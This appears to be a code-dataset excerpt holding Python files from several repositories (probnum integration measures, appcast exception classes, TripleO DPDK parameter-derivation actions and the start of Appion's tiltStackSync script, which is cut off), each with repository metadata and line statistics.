# Check that the domain is non-empty
if not np.all(domain_a < domain_b):
raise ValueError("Domain must be non-empty.")
self.dim = dim
self.domain = (domain_a, domain_b)
class LebesgueMeasure(IntegrationMeasure):
"""Lebesgue measure on a hyper-rectangle.
Parameters
----------
dim :
Dimension of the integration domain
domain :
Tuple which contains two arrays which define the start and end points,
respectively, of the rectangular integration domain.
normalized :
Boolean which controls whether or not the measure is normalized (i.e.,
integral over the domain is one).
"""
# pylint: disable=too-few-public-methods
class GaussianMeasure(IntegrationMeasure):
"""Gaussian measure on Euclidean space with given mean and covariance.
If ``mean`` and ``cov`` are scalars but ``dim`` is larger than one, ``mean`` and
``cov`` are extended to a constant vector and diagonal matrix, respectively,
of appropriate dimensions.
Parameters
----------
mean :
*shape=(dim,)* -- Mean of the Gaussian measure.
cov :
*shape=(dim, dim)* -- Covariance matrix of the Gaussian measure.
dim :
Dimension of the integration domain.
"""
| 34.708333 | 88 | 0.582451 | """Contains integration measures."""
import abc
from typing import Optional, Tuple, Union
import numpy as np
import scipy.stats
from probnum.randvars import Normal
from probnum.typing import FloatArgType, IntArgType
class IntegrationMeasure(abc.ABC):
"""An abstract class for a measure against which a target function is integrated.
Child classes implement specific integration measures and, if available, make use
of random variables for sampling and evaluation of the density function.
Parameters
----------
dim :
Dimension of the integration domain.
domain :
Tuple which contains two arrays which define the start and end points,
respectively, of the rectangular integration domain.
"""
def __init__(
self,
dim: IntArgType,
domain: Tuple[Union[np.ndarray, FloatArgType], Union[np.ndarray, FloatArgType]],
) -> None:
self._set_dimension_domain(dim, domain)
def __call__(self, points: Union[float, np.floating, np.ndarray]) -> np.ndarray:
"""Evaluate the density function of the integration measure.
Parameters
----------
points :
*shape=(n_points,) or (n_points, dim)* -- Input locations.
Returns
-------
density_evals :
*shape=(n_points,)* -- Density evaluated at given locations.
"""
# pylint: disable=no-member
return self.random_variable.pdf(points).squeeze()
def sample(
self,
rng: np.random.Generator,
n_sample: IntArgType,
) -> np.ndarray:
"""Sample ``n_sample`` points from the integration measure.
Parameters
----------
rng :
Random number generator
n_sample :
Number of points to be sampled
Returns
-------
points :
*shape=(n_sample,) or (n_sample,dim)* -- Sampled points
"""
# pylint: disable=no-member
return np.reshape(
self.random_variable.sample(rng=rng, size=n_sample),
newshape=(n_sample, self.dim),
)
def _set_dimension_domain(
self,
dim: IntArgType,
domain: Tuple[Union[np.ndarray, FloatArgType], Union[np.ndarray, FloatArgType]],
) -> None:
"""Sets the integration domain and dimension.
The following logic is used to set the domain and dimension:
1. If ``dim`` is not given (``dim == None``):
1a. If either ``domain[0]`` or ``domain[1]`` is a scalar, the dimension
is set as the maximum of their lengths and the scalar is expanded to
a constant vector.
1b. Otherwise, if the ``domain[0]`` and ``domain[1]`` are not of equal
length, an error is raised.
2. If ``dim`` is given:
2a. If both ``domain[0]`` and ``domain[1]`` are scalars, they are
expanded to constant vectors of length ``dim``.
2b. If only one of `domain[0]`` and ``domain[1]`` is a scalar and the
length of the other equals ``dim``, the scalar one is expanded to a
constant vector of length ``dim``.
2c. Otherwise, if neither of ``domain[0]`` and ``domain[1]`` is a
scalar, error is raised if either of them has length which does not
equal ``dim``.
"""
domain_a_dim = np.size(domain[0])
domain_b_dim = np.size(domain[1])
# Check that given dimensions match and are positive
dim_mismatch = False
if dim is None:
if domain_a_dim == domain_b_dim:
dim = domain_a_dim
elif domain_a_dim == 1 or domain_b_dim == 1:
dim = np.max([domain_a_dim, domain_b_dim])
else:
dim_mismatch = True
else:
if (domain_a_dim > 1 or domain_b_dim > 1) and dim != np.max(
[domain_a_dim, domain_b_dim]
):
dim_mismatch = True
if dim_mismatch:
raise ValueError(
"Domain limits must have the same length or at least "
"one of them has to be one-dimensional."
)
if dim < 1:
raise ValueError(f"Domain dimension dim = {dim} must be positive.")
# Use same domain limit in all dimensions if only one limit is given
if domain_a_dim == 1:
domain_a = np.full((dim,), domain[0])
else:
domain_a = domain[0]
if domain_b_dim == 1:
domain_b = np.full((dim,), domain[1])
else:
domain_b = domain[1]
# Check that the domain is non-empty
if not np.all(domain_a < domain_b):
raise ValueError("Domain must be non-empty.")
self.dim = dim
self.domain = (domain_a, domain_b)
class LebesgueMeasure(IntegrationMeasure):
"""Lebesgue measure on a hyper-rectangle.
Parameters
----------
dim :
Dimension of the integration domain
domain :
Tuple which contains two arrays which define the start and end points,
respectively, of the rectangular integration domain.
normalized :
Boolean which controls whether or not the measure is normalized (i.e.,
integral over the domain is one).
"""
def __init__(
self,
domain: Tuple[Union[np.ndarray, FloatArgType], Union[np.ndarray, FloatArgType]],
dim: Optional[IntArgType] = None,
normalized: Optional[bool] = False,
) -> None:
super().__init__(dim=dim, domain=domain)
# Set normalization constant
self.normalized = normalized
if self.normalized:
self.normalization_constant = 1.0 / np.prod(self.domain[1] - self.domain[0])
else:
self.normalization_constant = 1.0
if self.normalization_constant in [0, np.Inf, -np.Inf]:
raise ValueError(
"Normalization constant is too small or too large. "
"Consider setting normalized = False."
)
# Use scipy's uniform random variable since uniform random variables are not
# yet implemented in probnum
self.random_variable = scipy.stats.uniform(
loc=self.domain[0], scale=self.domain[1] - self.domain[0]
)
def __call__(self, points: Union[float, np.floating, np.ndarray]) -> np.ndarray:
num_dat = np.atleast_1d(points).shape[0]
return np.full(() if num_dat == 1 else (num_dat,), self.normalization_constant)
def sample(
self,
rng: np.random.Generator,
n_sample: IntArgType,
) -> np.ndarray:
return self.random_variable.rvs(size=(n_sample, self.dim), random_state=rng)
# pylint: disable=too-few-public-methods
class GaussianMeasure(IntegrationMeasure):
"""Gaussian measure on Euclidean space with given mean and covariance.
If ``mean`` and ``cov`` are scalars but ``dim`` is larger than one, ``mean`` and
``cov`` are extended to a constant vector and diagonal matrix, respectively,
of appropriate dimensions.
Parameters
----------
mean :
*shape=(dim,)* -- Mean of the Gaussian measure.
cov :
*shape=(dim, dim)* -- Covariance matrix of the Gaussian measure.
dim :
Dimension of the integration domain.
"""
def __init__(
self,
mean: Union[float, np.floating, np.ndarray],
cov: Union[float, np.floating, np.ndarray],
dim: Optional[IntArgType] = None,
) -> None:
# Extend scalar mean and covariance to higher dimensions if dim has been
# supplied by the user
# pylint: disable=fixme
# TODO: This needs to be modified to account for cases where only either the
# mean or covariance is given in scalar form
if (
(np.isscalar(mean) or mean.size == 1)
and (np.isscalar(cov) or cov.size == 1)
and dim is not None
):
mean = np.full((dim,), mean)
cov = cov * np.eye(dim)
# Set dimension based on the mean vector
if np.isscalar(mean):
dim = 1
else:
dim = mean.size
# If cov has been given as a vector of variances, transform to diagonal matrix
if isinstance(cov, np.ndarray) and np.squeeze(cov).ndim == 1 and dim > 1:
cov = np.diag(np.squeeze(cov))
# Exploit random variables to carry out mean and covariance checks
self.random_variable = Normal(mean=np.squeeze(mean), cov=np.squeeze(cov))
self.mean = self.random_variable.mean
self.cov = self.random_variable.cov
# Set diagonal_covariance flag
if dim == 1:
self.diagonal_covariance = True
else:
self.diagonal_covariance = (
np.count_nonzero(self.cov - np.diag(np.diagonal(self.cov))) == 0
)
super().__init__(
dim=dim,
domain=(np.full((dim,), -np.Inf), np.full((dim,), np.Inf)),
)
| 3,214 | 0 | 135 |
a41dca34310966caf3e8427d639781fcb0598d18 | 761 | py | Python | resources/lib/helpers/exceptions.py | CastagnaIT/script.appcast | a9c0d6c30316599d6892f944ac185a9331af4ec1 | [
"BSD-2-Clause",
"MIT"
] | 2 | 2021-01-16T21:45:57.000Z | 2021-01-24T06:31:16.000Z | resources/lib/helpers/exceptions.py | CastagnaIT/script.appcast | a9c0d6c30316599d6892f944ac185a9331af4ec1 | [
"BSD-2-Clause",
"MIT"
] | null | null | null | resources/lib/helpers/exceptions.py | CastagnaIT/script.appcast | a9c0d6c30316599d6892f944ac185a9331af4ec1 | [
"BSD-2-Clause",
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Copyright (C) 2021 Stefano Gottardo (script.appcast)
Exceptions
SPDX-License-Identifier: MIT
See LICENSES/MIT.md for more information.
"""
# Exceptions for DATABASE
class DBSQLiteConnectionError(Exception):
"""An error occurred in the database connection"""
class DBSQLiteError(Exception):
"""An error occurred in the database operations"""
class DBMySQLConnectionError(Exception):
"""An error occurred in the database connection"""
class DBMySQLError(Exception):
"""An error occurred in the database operations"""
class DBProfilesMissing(Exception):
"""There are no stored profiles in database"""
class DBRecordNotExistError(Exception):
"""The record do not exist in database"""
| 22.382353 | 56 | 0.720105 | # -*- coding: utf-8 -*-
"""
Copyright (C) 2021 Stefano Gottardo (script.appcast)
Exceptions
SPDX-License-Identifier: MIT
See LICENSES/MIT.md for more information.
"""
# Exceptions for DATABASE
class DBSQLiteConnectionError(Exception):
"""An error occurred in the database connection"""
class DBSQLiteError(Exception):
"""An error occurred in the database operations"""
class DBMySQLConnectionError(Exception):
"""An error occurred in the database connection"""
class DBMySQLError(Exception):
"""An error occurred in the database operations"""
class DBProfilesMissing(Exception):
"""There are no stored profiles in database"""
class DBRecordNotExistError(Exception):
"""The record do not exist in database"""
| 0 | 0 | 0 |
b8830ac7964ef91a4f94e8863c8ef461e382bb37 | 18,342 | py | Python | tripleo_common/actions/derive_params.py | AllenJSebastian/tripleo-common | d510a30266e002e90c358e69cb720bfdfa736134 | [
"Apache-2.0"
] | null | null | null | tripleo_common/actions/derive_params.py | AllenJSebastian/tripleo-common | d510a30266e002e90c358e69cb720bfdfa736134 | [
"Apache-2.0"
] | null | null | null | tripleo_common/actions/derive_params.py | AllenJSebastian/tripleo-common | d510a30266e002e90c358e69cb720bfdfa736134 | [
"Apache-2.0"
] | null | null | null | # Copyright 2017 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import math
import re
from mistral_lib import actions
from tripleo_common.actions import base
from tripleo_common import exception
LOG = logging.getLogger(__name__)
class GetDpdkNicsNumaInfoAction(base.TripleOAction):
"""Gets the DPDK NICs with MTU for NUMA nodes.
Find the DPDK interface names from the network config and
translate it to phsical interface names using the introspection
data. And then find the NUMA node associated with the DPDK
interface and the MTU value.
:param network_configs: network config list
:param inspect_data: introspection data
:param mtu_default: mtu default value for NICs
:return: DPDK NICs NUMA nodes info
"""
# TODO(jpalanis): Expose this utility from os-net-config to sort
# active nics
# TODO(jpalanis): Expose this utility from os-net-config to sort
# active nics
# TODO(jpalanis): Expose this utility from os-net-config to sort
# active nics
# Gets numa node id for physical NIC name
# Get physical interface name for NIC name
# Gets dpdk interfaces and mtu info for dpdk config
# Default mtu(recommended 1500) is used if no MTU is set for DPDK NIC
class GetDpdkCoreListAction(base.TripleOAction):
"""Gets the DPDK PMD Core List.
With input as the number of physical cores for each NUMA node,
find the right logical CPUs to be allocated along with its
siblings for the PMD core list.
:param inspect_data: introspection data
:param numa_nodes_cores_count: physical cores count for each NUMA
:return: DPDK Core List
"""
class GetHostCpusListAction(base.TripleOAction):
"""Gets the Host CPUs List.
CPU threads from first physical core is allocated for host processes
on each NUMA nodes.
:param inspect_data: introspection data
:return: Host CPUs List
"""
class GetDpdkSocketMemoryAction(base.TripleOAction):
"""Gets the DPDK Socket Memory List.
For NUMA node with DPDK nic, socket memory is calculated
based on MTU, Overhead and Packet size in buffer.
For NUMA node without DPDK nic, minimum socket memory is
assigned (recommended 1GB)
:param dpdk_nics_numa_info: DPDK nics numa info
:param numa_nodes: list of numa nodes
:param overhead: overhead value
:param packet_size_in_buffer: packet size in buffer
:param minimum_socket_memory: minimum socket memory
:return: DPDK Socket Memory List
"""
# Computes round off MTU value in bytes
# example: MTU value 9000 into 9216 bytes
# Calculates socket memory for a NUMA node
class ConvertNumberToRangeListAction(base.TripleOAction):
"""Converts number list into range list
:param num_list: comma delimited number list as string
:return: comma delimited range list as string
"""
# converts number list into range list.
# here input parameter and return value as list
# example: [12, 13, 14, 17] into ["12-14", "17"]
class ConvertRangeToNumberListAction(base.TripleOAction):
"""Converts range list to integer list
:param range_list: comma delimited range list as string / list
:return: comma delimited number list as string
"""
# converts range list into number list
# here input parameter and return value as list
# example: ["12-14", "^13", "17"] into [12, 14, 17]
| 39.360515 | 79 | 0.602061 | # Copyright 2017 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import math
import re
from mistral_lib import actions
from tripleo_common.actions import base
from tripleo_common import exception
LOG = logging.getLogger(__name__)
class GetDpdkNicsNumaInfoAction(base.TripleOAction):
"""Gets the DPDK NICs with MTU for NUMA nodes.
Find the DPDK interface names from the network config and
translate it to phsical interface names using the introspection
data. And then find the NUMA node associated with the DPDK
interface and the MTU value.
:param network_configs: network config list
:param inspect_data: introspection data
:param mtu_default: mtu default value for NICs
:return: DPDK NICs NUMA nodes info
"""
def __init__(self, network_configs, inspect_data, mtu_default=1500):
super(GetDpdkNicsNumaInfoAction, self).__init__()
self.network_configs = network_configs
self.inspect_data = inspect_data
self.mtu_default = mtu_default
# TODO(jpalanis): Expose this utility from os-net-config to sort
# active nics
def _natural_sort_key(self, s):
nsre = re.compile('([0-9]+)')
return [int(text) if text.isdigit() else text
for text in re.split(nsre, s)]
# TODO(jpalanis): Expose this utility from os-net-config to sort
# active nics
def _is_embedded_nic(self, nic):
if (nic.startswith('em') or nic.startswith('eth') or
nic.startswith('eno')):
return True
return False
# TODO(jpalanis): Expose this utility from os-net-config to sort
# active nics
def _ordered_nics(self, interfaces):
embedded_nics = []
nics = []
for iface in interfaces:
nic = iface.get('name', '')
if self._is_embedded_nic(nic):
embedded_nics.append(nic)
else:
nics.append(nic)
active_nics = (sorted(
embedded_nics, key=self._natural_sort_key) +
sorted(nics, key=self._natural_sort_key))
return active_nics
# Gets numa node id for physical NIC name
def find_numa_node_id(self, numa_nics, nic_name):
for nic_info in numa_nics:
if nic_info.get('name', '') == nic_name:
return nic_info.get('numa_node', None)
return None
# Get physical interface name for NIC name
def get_physical_iface_name(self, ordered_nics, nic_name):
if nic_name.startswith('nic'):
# Nic numbering, find the actual interface name
nic_number = int(nic_name.replace('nic', ''))
if nic_number > 0:
iface_name = ordered_nics[nic_number - 1]
return iface_name
return nic_name
# Gets dpdk interfaces and mtu info for dpdk config
# Default mtu(recommended 1500) is used if no MTU is set for DPDK NIC
def get_dpdk_interfaces(self, dpdk_objs):
mtu = self.mtu_default
dpdk_ifaces = []
for dpdk_obj in dpdk_objs:
obj_type = dpdk_obj.get('type')
mtu = dpdk_obj.get('mtu', self.mtu_default)
if obj_type == 'ovs_dpdk_port':
# Member interfaces of ovs_dpdk_port
dpdk_ifaces.extend(dpdk_obj.get('members', []))
elif obj_type == 'ovs_dpdk_bond':
# ovs_dpdk_bond will have multiple ovs_dpdk_ports
for bond_member in dpdk_obj.get('members', []):
if bond_member.get('type') == 'ovs_dpdk_port':
dpdk_ifaces.extend(bond_member.get('members', []))
return (dpdk_ifaces, mtu)
def run(self, context):
interfaces = self.inspect_data.get('inventory',
{}).get('interfaces', [])
# Checks whether inventory interfaces information is not available
# in introspection data.
if not interfaces:
msg = 'Introspection data does not have inventory.interfaces'
return actions.Result(error=msg)
numa_nics = self.inspect_data.get('numa_topology',
{}).get('nics', [])
# Checks whether numa topology nics information is not available
# in introspection data.
if not numa_nics:
msg = 'Introspection data does not have numa_topology.nics'
return actions.Result(error=msg)
active_interfaces = [iface for iface in interfaces
if iface.get('has_carrier', False)]
# Checks whether active interfaces are not available
if not active_interfaces:
msg = 'Unable to determine active interfaces (has_carrier)'
return actions.Result(error=msg)
dpdk_nics_numa_info = []
ordered_nics = self._ordered_nics(active_interfaces)
# Gets DPDK network config and parses to get DPDK NICs
# with mtu and numa node id
for config in self.network_configs:
if config.get('type', '') == 'ovs_user_bridge':
bridge_name = config.get('name', '')
addresses = config.get('addresses', [])
members = config.get('members', [])
dpdk_ifaces, mtu = self.get_dpdk_interfaces(members)
for dpdk_iface in dpdk_ifaces:
type = dpdk_iface.get('type', '')
if type == 'sriov_vf':
name = dpdk_iface.get('device', '')
else:
name = dpdk_iface.get('name', '')
phy_name = self.get_physical_iface_name(
ordered_nics, name)
node = self.find_numa_node_id(numa_nics, phy_name)
if node is None:
msg = ('Unable to determine NUMA node for '
'DPDK NIC: %s' % phy_name)
return actions.Result(error=msg)
dpdk_nic_info = {'name': phy_name,
'numa_node': node,
'mtu': mtu,
'bridge_name': bridge_name,
'addresses': addresses}
dpdk_nics_numa_info.append(dpdk_nic_info)
return dpdk_nics_numa_info
class GetDpdkCoreListAction(base.TripleOAction):
"""Gets the DPDK PMD Core List.
With input as the number of physical cores for each NUMA node,
find the right logical CPUs to be allocated along with its
siblings for the PMD core list.
:param inspect_data: introspection data
:param numa_nodes_cores_count: physical cores count for each NUMA
:return: DPDK Core List
"""
def __init__(self, inspect_data, numa_nodes_cores_count):
super(GetDpdkCoreListAction, self).__init__()
self.inspect_data = inspect_data
self.numa_nodes_cores_count = numa_nodes_cores_count
def run(self, context):
dpdk_core_list = []
numa_cpus_info = self.inspect_data.get('numa_topology',
{}).get('cpus', [])
# Checks whether numa topology cpus information is not available
# in introspection data.
if not numa_cpus_info:
msg = 'Introspection data does not have numa_topology.cpus'
return actions.Result(error=msg)
# Checks whether CPU physical cores count for each NUMA nodes is
# not available
if not self.numa_nodes_cores_count:
msg = ('CPU physical cores count for each NUMA nodes '
'is not available')
return actions.Result(error=msg)
numa_nodes_threads = {}
# Creates list for all available threads in each NUMA node
for cpu in numa_cpus_info:
if not cpu['numa_node'] in numa_nodes_threads:
numa_nodes_threads[cpu['numa_node']] = []
numa_nodes_threads[cpu['numa_node']].extend(cpu['thread_siblings'])
for node, node_cores_count in enumerate(self.numa_nodes_cores_count):
# Gets least thread in NUMA node
numa_node_min = min(numa_nodes_threads[node])
cores_count = node_cores_count
for cpu in numa_cpus_info:
if cpu['numa_node'] == node:
# Adds threads from core which is not having least thread
if numa_node_min not in cpu['thread_siblings']:
dpdk_core_list.extend(cpu['thread_siblings'])
cores_count -= 1
if cores_count == 0:
break
return ','.join([str(thread) for thread in dpdk_core_list])
class GetHostCpusListAction(base.TripleOAction):
"""Gets the Host CPUs List.
CPU threads from first physical core is allocated for host processes
on each NUMA nodes.
:param inspect_data: introspection data
:return: Host CPUs List
"""
def __init__(self, inspect_data):
super(GetHostCpusListAction, self).__init__()
self.inspect_data = inspect_data
def run(self, context):
host_cpus_list = []
numa_cpus_info = self.inspect_data.get('numa_topology',
{}).get('cpus', [])
# Checks whether numa topology cpus information is not available
# in introspection data.
if not numa_cpus_info:
msg = 'Introspection data does not have numa_topology.cpus'
return actions.Result(error=msg)
numa_nodes_threads = {}
# Creates a list for all available threads in each NUMA nodes
for cpu in numa_cpus_info:
if not cpu['numa_node'] in numa_nodes_threads:
numa_nodes_threads[cpu['numa_node']] = []
numa_nodes_threads[cpu['numa_node']].extend(
cpu['thread_siblings'])
for numa_node in sorted(numa_nodes_threads.keys()):
node = int(numa_node)
# Gets least thread in NUMA node
numa_node_min = min(numa_nodes_threads[numa_node])
for cpu in numa_cpus_info:
if cpu['numa_node'] == node:
# Adds threads from core which is having least thread
if numa_node_min in cpu['thread_siblings']:
host_cpus_list.extend(cpu['thread_siblings'])
break
return ','.join([str(thread) for thread in host_cpus_list])
class GetDpdkSocketMemoryAction(base.TripleOAction):
"""Gets the DPDK Socket Memory List.
For NUMA node with DPDK nic, socket memory is calculated
based on MTU, Overhead and Packet size in buffer.
For NUMA node without DPDK nic, minimum socket memory is
assigned (recommended 1GB)
:param dpdk_nics_numa_info: DPDK nics numa info
:param numa_nodes: list of numa nodes
:param overhead: overhead value
:param packet_size_in_buffer: packet size in buffer
:param minimum_socket_memory: minimum socket memory
:return: DPDK Socket Memory List
"""
def __init__(self, dpdk_nics_numa_info, numa_nodes,
overhead, packet_size_in_buffer,
minimum_socket_memory=1024):
super(GetDpdkSocketMemoryAction, self).__init__()
self.dpdk_nics_numa_info = dpdk_nics_numa_info
self.numa_nodes = numa_nodes
self.overhead = overhead
self.packet_size_in_buffer = packet_size_in_buffer
self.minimum_socket_memory = minimum_socket_memory
# Computes round off MTU value in bytes
# example: MTU value 9000 into 9216 bytes
def roundup_mtu_bytes(self, mtu):
max_div_val = int(math.ceil(float(mtu) / float(1024)))
return (max_div_val * 1024)
# Calculates socket memory for a NUMA node
def calculate_node_socket_memory(
self, numa_node, dpdk_nics_numa_info, overhead,
packet_size_in_buffer, minimum_socket_memory):
distinct_mtu_per_node = []
socket_memory = 0
# For DPDK numa node
for nics_info in dpdk_nics_numa_info:
if (numa_node == nics_info['numa_node'] and
not nics_info['mtu'] in distinct_mtu_per_node):
distinct_mtu_per_node.append(nics_info['mtu'])
roundup_mtu = self.roundup_mtu_bytes(nics_info['mtu'])
socket_memory += (((roundup_mtu + overhead) *
packet_size_in_buffer) /
(1024 * 1024))
# For Non DPDK numa node
if socket_memory == 0:
socket_memory = minimum_socket_memory
# For DPDK numa node
else:
socket_memory += 512
socket_memory_in_gb = int(socket_memory / 1024)
if socket_memory % 1024 > 0:
socket_memory_in_gb += 1
return (socket_memory_in_gb * 1024)
def run(self, context):
dpdk_socket_memory_list = []
for node in self.numa_nodes:
socket_mem = self.calculate_node_socket_memory(
node, self.dpdk_nics_numa_info, self.overhead,
self.packet_size_in_buffer,
self.minimum_socket_memory)
dpdk_socket_memory_list.append(socket_mem)
return ','.join([str(sm) for sm in dpdk_socket_memory_list])
class ConvertNumberToRangeListAction(base.TripleOAction):
"""Converts number list into range list
:param num_list: comma delimited number list as string
:return: comma delimited range list as string
"""
def __init__(self, num_list):
super(ConvertNumberToRangeListAction, self).__init__()
self.num_list = num_list
# converts number list into range list.
# here input parameter and return value as list
# example: [12, 13, 14, 17] into ["12-14", "17"]
def convert_number_to_range_list(self, num_list):
num_list.sort()
range_list = []
range_min = num_list[0]
for num in num_list:
next_val = num + 1
if next_val not in num_list:
if range_min != num:
range_list.append(str(range_min) + '-' + str(num))
else:
range_list.append(str(range_min))
next_index = num_list.index(num) + 1
if next_index < len(num_list):
range_min = num_list[next_index]
# here, range_list is a list of strings
return range_list
def run(self, context):
try:
if not self.num_list:
err_msg = ("Input param 'num_list' is blank.")
raise exception.DeriveParamsError(err_msg)
try:
# splitting a string (comma delimited list) into
# list of numbers
# example: "12,13,14,17" string into [12,13,14,17]
num_list = [int(num.strip(' '))
for num in self.num_list.split(",")]
except ValueError as exc:
err_msg = ("Invalid number in input param "
"'num_list': %s" % exc)
raise exception.DeriveParamsError(err_msg)
range_list = self.convert_number_to_range_list(num_list)
except exception.DeriveParamsError as err:
LOG.error('Derive Params Error: %s', err)
return actions.Result(error=str(err))
# converts into comma delimited range list as string
return ','.join(range_list)
class ConvertRangeToNumberListAction(base.TripleOAction):
"""Converts range list to integer list
:param range_list: comma delimited range list as string / list
:return: comma delimited number list as string
"""
def __init__(self, range_list):
super(ConvertRangeToNumberListAction, self).__init__()
self.range_list = range_list
# converts range list into number list
# here input parameter and return value as list
# example: ["12-14", "^13", "17"] into [12, 14, 17]
def convert_range_to_number_list(self, range_list):
num_list = []
exclude_num_list = []
try:
for val in range_list:
val = val.strip(' ')
if '^' in val:
exclude_num_list.append(int(val[1:]))
elif '-' in val:
split_list = val.split("-")
range_min = int(split_list[0])
range_max = int(split_list[1])
num_list.extend(range(range_min, (range_max + 1)))
else:
num_list.append(int(val))
except ValueError as exc:
err_msg = ("Invalid number in input param "
"'range_list': %s" % exc)
raise exception.DeriveParamsError(err_msg)
# here, num_list is a list of integers
return [num for num in num_list if num not in exclude_num_list]
def run(self, context):
try:
if not self.range_list:
err_msg = ("Input param 'range_list' is blank.")
raise exception.DeriveParamsError(err_msg)
range_list = self.range_list
# converts into python list if range_list is not list type
if not isinstance(range_list, list):
range_list = self.range_list.split(",")
num_list = self.convert_range_to_number_list(range_list)
except exception.DeriveParamsError as err:
LOG.error('Derive Params Error: %s', err)
return actions.Result(error=str(err))
# converts into comma delimited number list as string
return ','.join([str(num) for num in num_list])
| 13,802 | 0 | 583 |
a1a1aa9f7cbbc6265cfe3b922867e0bc944af177 | 12,974 | py | Python | appion/build/scripts-2.7/tiltStackSync.py | leschzinerlab/myami-3.2-freeHand | 974b8a48245222de0d9cfb0f433533487ecce60d | [
"MIT"
] | null | null | null | appion/build/scripts-2.7/tiltStackSync.py | leschzinerlab/myami-3.2-freeHand | 974b8a48245222de0d9cfb0f433533487ecce60d | [
"MIT"
] | null | null | null | appion/build/scripts-2.7/tiltStackSync.py | leschzinerlab/myami-3.2-freeHand | 974b8a48245222de0d9cfb0f433533487ecce60d | [
"MIT"
] | 1 | 2019-09-05T20:58:37.000Z | 2019-09-05T20:58:37.000Z | #!/bin/python
#python
import sys
import os
import time
import re
import shutil
import MySQLdb
#appion
from appionlib import appionScript
from appionlib import apStack
from appionlib import apDisplay
from appionlib import apEMAN
from appionlib import apFile
from appionlib.apSpider import operations
from appionlib.apTilt import apTiltPair
from appionlib import apImagicFile
import sinedon
#=====================
if __name__ == "__main__":
tiltstacks = tiltStackSync()
tiltstacks.start()
tiltstacks.close()
| 35.545205 | 108 | 0.697934 | #!/bin/python
#python
import sys
import os
import time
import re
import shutil
import MySQLdb
#appion
from appionlib import appionScript
from appionlib import apStack
from appionlib import apDisplay
from appionlib import apEMAN
from appionlib import apFile
from appionlib.apSpider import operations
from appionlib.apTilt import apTiltPair
from appionlib import apImagicFile
import sinedon
class tiltStackSync(appionScript.AppionScript):
def __init__(self):
"""
Need to connect to DB server before moving forward
"""
appionScript.AppionScript.__init__(self)
# connect
self.dbconf = sinedon.getConfig('appiondata')
self.db = MySQLdb.connect(**self.dbconf)
self.db.autocommit(True)
# create a cursor
self.cursor = self.db.cursor()
#=====================
def setupParserOptions(self):
self.parser.set_usage("Usage: %prog --notstackid=1239 --tiltstackid=1240")
self.parser.add_option("--tiltstackid", dest="tiltstackid",
help="Tilted stack id", metavar="ID")
self.parser.add_option("--notstackid", dest="notstackid",
help="Untilted stack id", metavar="ID")
#=====================
def checkConflicts(self):
if self.params['tiltstackid'] is None:
apDisplay.printError("Enter a tilted stack ID")
if self.params['notstackid'] is None:
apDisplay.printError("Enter a untilted stack ID")
if self.params['runname'] is None:
apDisplay.printError("Enter run name")
self.tiltstackdata = apStack.getOnlyStackData(self.params['tiltstackid'])
#=====================
def setRunDir(self):
stackpath = self.tiltstackdata['path']['path']
self.params['rundir'] = os.path.abspath(os.path.join(stackpath, "../tiltsync", self.params['runname']))
#=====================
def getPartcileLists(self):
#first query
query1 = self.queryParticles(swap=False)
self.cursor.execute(query1)
results1 = self.cursor.fetchall()
apDisplay.printMsg("Found "+str(len(results1))+" particle pairs in forward order")
#if len(results1) < 2:
# apDisplay.printError("Failed to find any particles")
#swap particle1 and particle2 in ApTiltParticlePairData
query2 = self.queryParticles(swap=True)
self.cursor.execute(query2)
results2 = self.cursor.fetchall()
apDisplay.printMsg("Found "+str(len(results2))+" particle pairs in reverse order")
#if len(results2) < 2:
# apDisplay.printError("Failed to find any particles")
parttree = self.parseResults(results1, results2)
f = open("tiltsync-"+self.timestamp+".dat", "w")
count = 0
for partdict in parttree:
count += 1
emannotnum = partdict['not']-1
emantiltnum = partdict['tilt']-1
line = operations.spiderOutLine(count, (emannotnum,emantiltnum))
f.write(line)
f.close()
apDisplay.printMsg("Writing "+str(len(parttree))+" particle pairs")
if len(parttree) < 2:
apDisplay.printError("Failed to find any particle pairs")
return parttree
#=====================
def parseResults(self, results1, results2):
parttree = []
for result in results1:
partdict = {}
partdict['not'] = int(result[0])
partdict['tilt'] = int(result[1])
parttree.append(partdict)
for result in results2:
partdict = {}
partdict['not'] = int(result[0])
partdict['tilt'] = int(result[1])
parttree.append(partdict)
apDisplay.printMsg("Parsed "+str(len(parttree))+" particle pairs")
return parttree
#=====================
def queryParticles(self, swap=False):
query = (
"SELECT "
+" stpart1.`particleNumber` AS partnum1, "
+" stpart2.`particleNumber` AS partnum2 "
+"FROM `ApTiltParticlePairData` AS tiltd "
)
if swap is True:
query += (
"LEFT JOIN `ApStackParticleData` AS stpart1 "
+" ON stpart1.`REF|ApParticleData|particle` = tiltd.`REF|ApParticleData|particle2` "
+"LEFT JOIN `ApStackParticleData` AS stpart2 "
+" ON stpart2.`REF|ApParticleData|particle` = tiltd.`REF|ApParticleData|particle1` "
)
else:
query += (
"LEFT JOIN `ApStackParticleData` AS stpart1 "
+" ON stpart1.`REF|ApParticleData|particle` = tiltd.`REF|ApParticleData|particle1` "
+"LEFT JOIN `ApStackParticleData` AS stpart2 "
+" ON stpart2.`REF|ApParticleData|particle` = tiltd.`REF|ApParticleData|particle2` "
)
query += (
"WHERE "
+" stpart1.`REF|ApStackData|stack` = "+str(self.params['notstackid'])+" "
+"AND "
+" stpart2.`REF|ApStackData|stack` = "+str(self.params['tiltstackid'])+" "
+"ORDER BY "
+" stpart1.`particleNumber` ASC "
+";"
)
#print query
return query
#=====================
def makeEulerDoc(self, parttree):
count = 0
eulerfile = os.path.join(self.params['rundir'], "eulersdoc"+self.timestamp+".spi")
eulerf = open(eulerfile, "w")
apDisplay.printMsg("creating Euler doc file")
starttime = time.time()
for partdict in parttree:
